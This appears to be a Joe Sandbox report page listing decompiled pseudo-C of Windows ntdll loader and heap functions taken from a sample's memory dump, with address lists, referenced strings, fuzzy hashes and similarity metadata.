Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 85aed5869689088010ca49cfa8aeed2aa79cd51325425ebaaff0e5ced4958555
Instruction ID: 0f0fa455bf6fe8b8c80cbe74fb1d02bbb02086e269a4ce47bad82c7050c1ff21
Opcode Fuzzy Hash: 85aed5869689088010ca49cfa8aeed2aa79cd51325425ebaaff0e5ced4958555
Instruction Fuzzy Hash: B741F0B5914324ABD710EF64CD51F9B7BF9EB45750F01582ABA48EB290EB38D801CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36B643D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E36B643D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E36B64B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x36bd6714; // 0x0
				_v16 = _t68;
				_t69 =  *0x36bd6710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x36bd6710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E36B64528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E36B64528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x36bd5ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x36bd37c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x36bd37c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E36B5E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x36bd91e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}

0x36b643e2
0x36b643e5
0x36b643e7
0x36b643f3
0x36b643fa
0x36b64401
0x36b6440b
0x36b6440f
0x36b64414
0x36b64418
0x36b64420
0x36b64424
0x36b6442e
0x36b6442e
0x36b64426
0x36b64426
0x36b64426
0x36b64424
0x36b64433
0x36b6445e
0x36b64443
0x36b64445
0x36b6444b
0x00000000
0x36b644c0
0x36b6446a
0x36b6446f
0x36b64471
0x00000000
0x00000000
0x36b64473
0x36b64479
0x36b6447b
0x36b644d4
0x36b644d4
0x36b644db
0x36b644de
0x36b644e6
0x36b644e9
0x36b644ef
0x36b644f9
0x36b644fc
0x36b644ff
0x36b64502
0x36b6451e
0x36b64523
0x36b644c9
0x36b644d1
0x36b644d1
0x36b64489
0x36b6448f
0x36b64491
0x36b64493
0x00000000
0x00000000
0x36b64495
0x36b64498
0x36b6449a
0x36b6449c
0x36b644b8
0x36b644bb
0x36b644bb
0x36b644be
0x00000000
0x00000000
0x36b644b2
0x36b644b4
0x00000000
0x00000000
0x36b644b6
0x36b644b6
0x00000000
0x36b644b8
0x36b6449e
0x36b644a0
0x36b644a2
0x36b644a4
0x00000000
0x00000000
0x00000000
0x00000000
0x36b644a6
0x36b644a6
0x36b644a6
0x36b644a8
0x36b644aa
0x36b644ac
0x36b644ac
0x36b644b0
0x36b644c4
0x00000000
0x36b644c4
0x36b6444d
0x36b64450
0x36b64450
0x36b64452
0x36b6445c
0x36b6445c
0x00000000
0x36b6445c
0x36b64454
0x36b64456
0x00000000
0x00000000
0x36b64458
0x00000000
0x36b64458
0x36b64447
0x00000000
0x36b64447
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36B64489

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 36B64519
LdrpCheckRedirection, xrefs: 36B6450F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36B64508

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: a0e6d3c4193293488d6e49d41de3c34837c0a5c4ded23b7cab5b6558d0c4dd0f
Instruction ID: 79765938d6b5d6cedca6f04dc300f585f4aa8f2bc13471d37578c2bb85f66aba
Opcode Fuzzy Hash: a0e6d3c4193293488d6e49d41de3c34837c0a5c4ded23b7cab5b6558d0c4dd0f
Instruction Fuzzy Hash: 6B410176A04B219BDB10CF6BC841A1677E4FF48798F058659ED88EB211DF70E800CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 36AD7662 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E36AD7662(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E36ADB910();
					} else {
						E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E36ADB910("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E36ADB910(", passed to %s", _t29);
					}
					_push("\n");
					E36ADB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x36bd47a1 = 1;
						asm("int3");
						 *0x36bd47a1 = 0;
					}
					return 0;
				}
				return 1;
			}

0x36ad7667
0x36ad7669
0x36ad7672
0x36b3ad93
0x36b3adb2
0x36b3adb7
0x36b3ad95
0x36b3adaa
0x36b3adaf
0x36b3adc3
0x36b3adcc
0x36b3add4
0x36b3adda
0x36b3addb
0x36b3ade0
0x36b3adf0
0x36b3adf2
0x36b3adf9
0x36b3adfa
0x36b3adfa
0x00000000
0x36b3ae01
0x00000000

Strings

HEAP[%wZ]: , xrefs: 36B3ADA5
HEAP: , xrefs: 36B3ADB2
RtlFreeHeap, xrefs: 36B3ADCE
Invalid heap signature for heap at %p, xrefs: 36B3ADBE
, passed to %s, xrefs: 36B3ADCF

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: fd7e63785cfe70a9af30ac343a84922bf00fbe519a91d587b4f861fe0e436931
Instruction ID: 04b5f40139db96f373631117d0772b905f12220d61eb9f3443a31eb11ad705c6
Opcode Fuzzy Hash: fd7e63785cfe70a9af30ac343a84922bf00fbe519a91d587b4f861fe0e436931
Instruction Fuzzy Hash: 13014C76516290EEE3058739D92DF427BF8EB41771F35408EEC044BAA1CFA9D844DE61

Uniqueness

Uniqueness Score: -1.00%

Function 36AE0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E36AE0485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x36bd6630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E36AE82E0(0xabababab, 0, "kLsE", 0);
					 *0x36bd6630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							if(E36B05C3F(_t89 + 0x14, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E36AE0670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E36AE0670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E36AE0630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E36B25050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push("true");
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E36B23EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E36AE0690) {
					 *0x36bd91e0();
					_t50 =  *_t73();
				} else {
					_t50 = E36AE0690();
				}
				_t84 = _t50;
				goto L4;
			}

0x36ae048f
0x36ae0493
0x36ae049a
0x36ae04a0
0x36ae04a3
0x36ae04a6
0x36ae04af
0x36ae04b8
0x36ae04c2
0x36ae04cb
0x36ae04ce
0x36ae04d2
0x36ae04d6
0x36ae060e
0x36ae0610
0x36ae0618
0x00000000
0x00000000
0x36ae04ef
0x36ae04ef
0x36ae04f2
0x36ae05e3
0x36ae05ea
0x36ae05f1
0x36ae05f1
0x36ae0501
0x36ae0501
0x36ae0504
0x36ae050c
0x36ae0519
0x36ae051b
0x00000000
0x36b3e99c
0x36b3e9ac
0x36ae051f
0x36ae052a
0x36b3e9b9
0x36ae05cd
0x36ae05d3
0x36ae05d3
0x36b3e9bf
0x36ae053c
0x36ae054d
0x36ae0559
0x36ae0562
0x36b3e9ce
0x36b3e9ce
0x36ae056a
0x36ae057b
0x36ae0580
0x36ae0580
0x36ae058f
0x36ae0597
0x36ae0598
0x36ae059d
0x36ae05a1
0x36ae05a5
0x36ae05ad
0x36ae05b3
0x36b3e9dd
0x00000000
0x36b3e9ed
0x00000000
0x36b3e9ed
0x36b3e9dd
0x36ae05b9
0x36ae05be
0x36ae05c7
0x36b3e9f2
0x36b3e9f2
0x36ae05c7
0x00000000
0x36ae05ad
0x00000000
0x36b3e9b2
0x36ae050c
0x36ae04fb
0x36b3e989
0x36b3e990
0x00000000
0x36b3e990
0x00000000
0x36ae04fb
0x36ae04dc
0x36ae04e2
0x36ae05d6
0x36ae05dc
0x36ae04e8
0x36ae04e8
0x36ae04e8
0x36ae04ed
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36AE05D6

Strings

kLsE, xrefs: 36AE05FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36AE0586

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: b4897158580748721cd89b9d3dd8ace95f4fda971454629e27c5e592c7b420ad
Instruction ID: 007f86608d52b18dbdc18dc7205aa0f623e4de49f29cf39ddd03ecf206b9e908
Opcode Fuzzy Hash: b4897158580748721cd89b9d3dd8ace95f4fda971454629e27c5e592c7b420ad
Instruction Fuzzy Hash: 5D51DFB5A00706DFEB10DFA5C8807ABB7F8AF44304F10853ED9999B240EB749555DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 36AEA2E0 Relevance: 5.3, Strings: 4, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E36AEA2E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed short* _a12) {
				char _v12;
				char* _v16;
				char _v20;
				char* _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				signed int _v48;
				signed int _v52;
				void* _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v81;
				signed int _v84;
				void* _v88;
				void* _v89;
				signed short _v92;
				char _v93;
				void* _v100;
				void* _v101;
				intOrPtr* _t122;
				signed char* _t123;
				signed char* _t125;
				intOrPtr* _t128;
				signed char* _t129;
				signed char* _t131;
				intOrPtr _t133;
				signed int _t139;
				signed short* _t159;
				intOrPtr _t163;
				signed int _t178;
				signed int _t183;

				_t122 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				_v48 = __edx;
				_v52 = __ecx;
				_v64 = 0;
				_v28 = 0x3a0038;
				_v24 = L"LdrResFallbackLangList Enter";
				_v20 = 0x380036;
				_v16 = L"LdrResFallbackLangList Exit";
				if(_t122 != 0) {
					if( *_t122 == 0) {
						goto L1;
					}
					_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					L2:
					if(( *_t123 & 0x00000001) != 0) {
						if(E36AF3C40() == 0) {
							_t125 = 0x7ffe0384;
						} else {
							_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E36B6FC01( &_v28,  *_t125 & 0x000000ff);
					}
					_t159 = _a12;
					if(_t159 == 0) {
						_t163 = 0xc000000d;
						_v68 = 0xc000000d;
						goto L35;
					} else {
						_t183 = 0;
						 *_t159 = 0;
						_t159[0x102] = 0;
						_v60 = 0;
						_v68 = 0;
						_v81 = 0;
						_v56 = 0;
						while(1) {
							L5:
							_v72 = 0;
							while(1) {
								L6:
								_t139 = _t183;
								_t178 = _t183;
								_t183 = _t183 + 1;
								if(_t139 > 7) {
									break;
								}
								switch( *((intOrPtr*)(_t139 * 4 +  &M36AEA60C))) {
									case 0:
										__ax = _a4;
										_v64 = 1;
										goto L14;
									case 1:
										if((_a8 & 0x00000004) != 0) {
											 *((char*)(__ebx + 0x204)) = 1;
											goto L34;
										}
										if((_a4 & 0x000003ff) != 0) {
											__edx =  &_v76;
											 *((char*)(__ebx + 0x204)) = 1;
											if(E36AD88C8(__ecx, __edx) < 0) {
												goto L34;
											}
											__ax = _v76;
											_v72 = __ax;
											__eax = _v72;
											if(__ax != 0) {
												__esi = __edi;
											} else {
												__esi = __esi | 0xffffffff;
											}
											L30:
											_v64 = 2;
											goto L15;
										}
										__eax = 0xeeee;
										_v72 = 0xeeee;
										goto L30;
									case 2:
										_v80 = 0;
										if(E36AEA630() == 0) {
											goto L24;
										}
										_t166 = _v60;
										if(_v60 >= ( *( *( *[fs:0x18] + 0xfc0) + 4) & 0x0000ffff)) {
											goto L24;
										}
										E36AEA750( *( *[fs:0x18] + 0xfc0), _t166,  &_v80,  &_v81);
										_t149 = _v92 & 0x0000ffff;
										_v84 = _t149;
										if(_t149 == 0) {
											goto L24;
										}
										if(_v81 != 0) {
											if((_a8 & 0x00100000) != 0) {
												_v72 = 0xeeee;
												_t149 = _v72;
											}
										}
										_v60 = _v60 + 1;
										_t183 = _t178;
										_v64 = 3;
										goto L15;
									case 3:
										__eax = _v52;
										if(__eax == 0) {
											L24:
											_v72 = 0xeeee;
											goto L6;
										}
										__edx = _v48;
										 &_v36 =  &_v44;
										__ecx = __eax;
										__eax = E36AEA1E3(__ecx, __edx,  &_v44,  &_v36, _a8);
										if(__eax >= 0) {
											 &_v12 = E36B25050(__ecx,  &_v12, _v44);
											 &_v48 =  &_v20;
											__eax = E36B056E0( &_v20,  &_v48);
											if(__al == 0) {
												_v68 = 0xc00b0005;
												goto L24;
											}
											__ax =  *((intOrPtr*)(__esp + 0x3c));
											_v72 = __eax;
											_v80 = __ax;
											if((_a8 & 0x00100000) != 0) {
												__edx =  *[fs:0x18];
												 &_v81 =  &_v80;
												__edx =  *( *[fs:0x18] + 0xfc0);
												__eax = E36AEA750(__edx, 0,  &_v80,  &_v81);
												if(_v93 == 0) {
													__ax = _v80;
													_v72 = __eax;
												} else {
													__eax = 0xeeee;
													_v72 = __ax;
												}
											}
											__eax = _v36;
											__al = __al & 0x00000001;
											__al & 0x000000ff =  ~(__al & 0x000000ff);
											asm("sbb eax, eax");
											 ~(__al & 0x000000ff) & 0x00000006 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											_v64 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											__eax = _v72;
											goto L15;
										}
										goto L24;
									case 4:
										__eax = 0xeeee;
										_v80 = __ax;
										__eax = _a8;
										__eax =  !_a8;
										if((__eax & 0x00080000) != 0) {
											goto L34;
										}
										if( *[fs:0x18] == 0) {
											__ax = _v80;
											goto L5;
										}
										__eax =  *[fs:0x18];
										__ax =  *((intOrPtr*)(__eax + 0xc4));
										goto L14;
									case 5:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v56;
										_push( &_v56);
										_push("true");
										__eax = E36B22AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__ax = _v56;
										goto L14;
									case 6:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v32;
										_push( &_v32);
										_push(0);
										__eax = E36B22AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__eax = _v32;
										if(__eax == _v56) {
											goto L6;
										}
										L14:
										_v72 = __eax;
										L15:
										if(_t149 == 0xeeee) {
											goto L6;
										}
										goto L16;
									case 7:
										__eax = 0x409;
										_v72 = __ax;
										L16:
										_t179 =  *_t159 & 0x0000ffff;
										_t168 = 0;
										_t175 = _t179;
										if(_t175 == 0) {
											L20:
											if(_t179 >= 0x40) {
												goto L34;
											}
											 *((short*)(_t159 + 4 + _t175 * 8)) = _v72;
											 *(_t159 + 8 + ( *_t159 & 0x0000ffff) * 8) = _v64;
											 *_t159 =  *_t159 + 1;
											goto L6;
										} else {
											_t152 =  &(_t159[2]);
											while(1) {
												_t179 =  *_t159 & 0x0000ffff;
												if( *_t152 == _v72) {
													break;
												}
												_t168 = _t168 + 1;
												_t152 =  &(_t152[4]);
												if(_t168 < _t175) {
													continue;
												}
												goto L20;
											}
											if(_t168 < _t175) {
												goto L6;
											}
											goto L20;
										}
								}
							}
							L34:
							_t163 = _v68;
							L35:
							_t128 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
							if(_t128 != 0) {
								if( *_t128 == 0) {
									goto L36;
								}
								_t129 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								L37:
								if(( *_t129 & 0x00000001) != 0) {
									if(E36AF3C40() == 0) {
										_t131 = 0x7ffe0384;
									} else {
										_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
									}
									E36B6FC01( &_v20,  *_t131 & 0x000000ff);
									_t133 = _v68;
								} else {
									_t133 = _t163;
								}
								return _t133;
							}
							L36:
							_t129 = 0x7ffe0385;
							goto L37;
						}
					}
				}
				L1:
				_t123 = 0x7ffe0385;
				goto L2;
			}

0x36aea2f4
0x36aea2f7
0x36aea2fb
0x36aea2ff
0x36aea307
0x36aea30f
0x36aea317
0x36aea31f
0x36aea329
0x36b429f7
0x00000000
0x00000000
0x36b42a06
0x36aea334
0x36aea337
0x36b42a17
0x36b42a29
0x36b42a19
0x36b42a22
0x36b42a22
0x36b42a35
0x36b42a35
0x36aea33d
0x36aea342
0x36b42a3f
0x36b42a44
0x00000000
0x36aea348
0x36aea34a
0x36aea34e
0x36aea351
0x36aea357
0x36aea35b
0x36aea35f
0x36aea363
0x36aea367
0x36aea367
0x36aea367
0x36aea370
0x36aea370
0x36aea370
0x36aea372
0x36aea374
0x36aea378
0x00000000
0x00000000
0x36aea37e
0x00000000
0x36aea3ff
0x36aea403
0x00000000
0x00000000
0x36aea4af
0x36b42b05
0x00000000
0x36b42b05
0x36aea4bc
0x36b42a52
0x36b42a56
0x36b42a64
0x00000000
0x00000000
0x36b42a6a
0x36b42a6f
0x36b42a77
0x36b42a7b
0x36b42a85
0x36b42a7d
0x36b42a7d
0x36b42a7d
0x36aea4cb
0x36aea4cb
0x00000000
0x36aea4cb
0x36aea4c2
0x36aea4c7
0x00000000
0x00000000
0x36aea387
0x36aea393
0x00000000
0x00000000
0x36aea39f
0x36aea3af
0x00000000
0x00000000
0x36aea3cd
0x36aea3d2
0x36aea3d7
0x36aea3de
0x00000000
0x00000000
0x36aea3e9
0x36b42a93
0x36b42a9e
0x36b42aa3
0x36b42aa3
0x36b42a93
0x36aea3ef
0x36aea3f3
0x36aea3f5
0x00000000
0x00000000
0x36aea46a
0x36aea470
0x36aea492
0x36aea497
0x00000000
0x36aea497
0x36aea475
0x36aea47e
0x36aea483
0x36aea485
0x36aea48c
0x36aea5b5
0x36aea5bf
0x36aea5c4
0x36aea5cb
0x36b42aee
0x00000000
0x36b42aee
0x36aea5d8
0x36aea5dd
0x36aea5e1
0x36aea5e6
0x36b42aac
0x36b42ab8
0x36b42abd
0x36b42ac5
0x36b42acf
0x36b42ae0
0x36b42ae5
0x36b42ad1
0x36b42ad1
0x36b42ad6
0x36b42ad6
0x36b42acf
0x36aea5ec
0x36aea5f0
0x36aea5f5
0x36aea5f7
0x36aea5fc
0x36aea5ff
0x36aea603
0x00000000
0x36aea603
0x00000000
0x00000000
0x36aea4d8
0x36aea4dd
0x36aea4e2
0x36aea4e5
0x36aea4ec
0x00000000
0x00000000
0x36aea4f6
0x36b42afb
0x00000000
0x36b42afb
0x36aea4fc
0x36aea502
0x00000000
0x00000000
0x36aea53c
0x36aea541
0x36aea546
0x36aea54a
0x36aea54b
0x36aea54d
0x36aea552
0x36aea558
0x00000000
0x00000000
0x36aea55e
0x00000000
0x00000000
0x36aea568
0x36aea56d
0x36aea572
0x36aea576
0x36aea577
0x36aea579
0x36aea57e
0x36aea584
0x00000000
0x00000000
0x36aea58a
0x36aea592
0x00000000
0x00000000
0x36aea40b
0x36aea40b
0x36aea40f
0x36aea417
0x00000000
0x00000000
0x00000000
0x00000000
0x36aea59d
0x36aea5a2
0x36aea41d
0x36aea41d
0x36aea420
0x36aea422
0x36aea426
0x36aea444
0x36aea448
0x00000000
0x00000000
0x36aea456
0x36aea45e
0x36aea462
0x00000000
0x36aea428
0x36aea428
0x36aea430
0x36aea437
0x36aea43a
0x00000000
0x00000000
0x36aea43c
0x36aea43d
0x36aea442
0x00000000
0x00000000
0x00000000
0x36aea442
0x36aea4a3
0x00000000
0x00000000
0x00000000
0x36aea4a9
0x00000000
0x36aea37e
0x36aea50e
0x36aea50e
0x36aea512
0x36aea518
0x36aea51d
0x36b42b14
0x00000000
0x00000000
0x36b42b23
0x36aea528
0x36aea52b
0x36b42b34
0x36b42b46
0x36b42b36
0x36b42b3f
0x36b42b3f
0x36b42b52
0x36b42b57
0x36aea531
0x36aea531
0x36aea531
0x36aea539
0x36aea539
0x36aea523
0x36aea523
0x00000000
0x36aea523
0x36aea367
0x36aea342
0x36aea32f
0x36aea32f
0x00000000

Strings

LdrResFallbackLangList Enter, xrefs: 36AEA30F
6, xrefs: 36AEA317
LdrResFallbackLangList Exit, xrefs: 36AEA31F
8, xrefs: 36AEA307

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 60370db8266b957273e0db20146d73cf25a50f476037b7dd13353a9bdfa60b72
Instruction ID: 4dc23361bdd1391e18cf017545e3b12a7c5bd1b1fe2841e73216f609f7ca771a
Opcode Fuzzy Hash: 60370db8266b957273e0db20146d73cf25a50f476037b7dd13353a9bdfa60b72
Instruction Fuzzy Hash: 64C1AE74508392CFE711CF19C840B5AB7E4FF84748F00886AFE958B250EBB4C949CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 36B18322 Relevance: 5.3, Strings: 4, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E36B18322() {
				intOrPtr _v0;
				signed int _v8;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				intOrPtr _v200;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char* _v236;
				intOrPtr _v240;
				char _v244;
				signed short _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				intOrPtr _v272;
				short _v274;
				char _v276;
				signed int _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v293;
				intOrPtr _v297;
				intOrPtr _v308;
				intOrPtr _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t77;
				signed int _t83;
				void* _t85;
				void* _t88;
				signed int _t94;
				signed short _t102;
				char _t113;
				void* _t127;
				void* _t137;
